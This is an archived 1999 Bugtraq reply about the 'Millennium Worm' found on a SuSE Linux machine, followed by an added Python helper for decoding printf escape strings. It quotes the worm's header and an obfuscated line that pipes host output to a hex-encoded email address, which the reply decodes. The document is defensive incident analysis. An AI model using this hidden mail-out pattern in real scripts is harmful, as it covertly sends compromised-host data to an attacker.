[11766] in bugtraq

Re: MW

daemon@ATHENA.MIT.EDU (Peter van Dijk)
Thu Sep 9 02:26:55 1999

Mail-Followup-To: BUGTRAQ@SECURITYFOCUS.COM
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-Id:  <19990904183949.L26571@attic.vuurwerk.nl>
Date:         Sat, 4 Sep 1999 18:39:49 +0200
Reply-To: Peter van Dijk <peter@ATTIC.VUURWERK.NL>
From: Peter van Dijk <peter@ATTIC.VUURWERK.NL>
X-To:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <37CCD1BD.69C3E9EE@weikert-bensheim.de>; from Christian Koderer
              on Wed, Sep 01, 1999 at 09:11:57AM +0200

On Wed, Sep 01, 1999 at 09:11:57AM +0200, Christian Koderer wrote:
> Does anybody know MW (millennium worm?) and how I get my s.u.s.e
> installation clean?
>
> "#!/bin/.mwsh
> # Millennium Worm by Anonymous
> # If you found this on your machine, but didn't download it
> # well.. you have a problem :)

I think you indeed do have a problem here :)

[snip]

> ./IP | mail `printf
> "\x62\x65\x75\x72\x70\x40\x68\x6f\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d"`

beurp@hotmail.com

Looks like a worm that tries a couple of exploits and mails
beurp@hotmail.com when successful.

Greetz, Peter
--
| 'He broke my heart,      |                              Peter van Dijk |
     I broke his neck'     |                     peter@attic.vuurwerk.nl |
   nognikz - As the sun    |        Hardbeat@ircnet - #cistron/#linux.nl |
http://www.nognikz.mdk.nu/ | Hardbeat@undernet - #groningen/#kinkfm/#vdh |
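
Added example, not part of the original message or of the worm's code: a small triage helper that finds runs of printf-style `\xNN` or octal escapes in a script and decodes them, which is how the address above is recovered from the quoted `printf` argument. The sample input is constructed from the two quoted lines (plus filler lines), and the function names are hypothetical.

```python
import re

# One printf-style escape: \xNN (hex) or \NNN (octal).
ESCAPE = r'\\x[0-9A-Fa-f]{1,2}|\\[0-7]{1,3}'
# A run of at least four escapes in a row; shorter runs are usually
# ordinary formatting rather than a hidden string.
RUN = re.compile(r'(?:%s){4,}' % ESCAPE)
EMAIL = re.compile(r'[\w.+-]+@[\w-]+(?:\.[\w-]+)+')

# Constructed sample: the two quoted lines from the message, with the
# mail-quoting prefix removed, preceded by two filler lines.
SAMPLE = r'''#!/bin/sh
echo "checking host"
./IP | mail `printf
"\x62\x65\x75\x72\x70\x40\x68\x6f\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d"`
'''


def decode_run(run):
    """Turn a run of \\xNN / \\NNN escapes into the text it encodes."""
    out = bytearray()
    for tok in re.findall(ESCAPE, run):
        if tok[1] == 'x':
            out.append(int(tok[2:], 16))
        else:
            out.append(int(tok[1:], 8) & 0xFF)
    return out.decode('latin-1')


def find_encoded_strings(script_text):
    """Report each escape run with its line number and decoded value."""
    findings = []
    for lineno, line in enumerate(script_text.splitlines(), 1):
        for match in RUN.finditer(line):
            decoded = decode_run(match.group(0))
            findings.append({
                'line': lineno,
                'decoded': decoded,
                'emails': EMAIL.findall(decoded),
            })
    return findings


if __name__ == '__main__':
    for finding in find_encoded_strings(SAMPLE):
        print(finding)
```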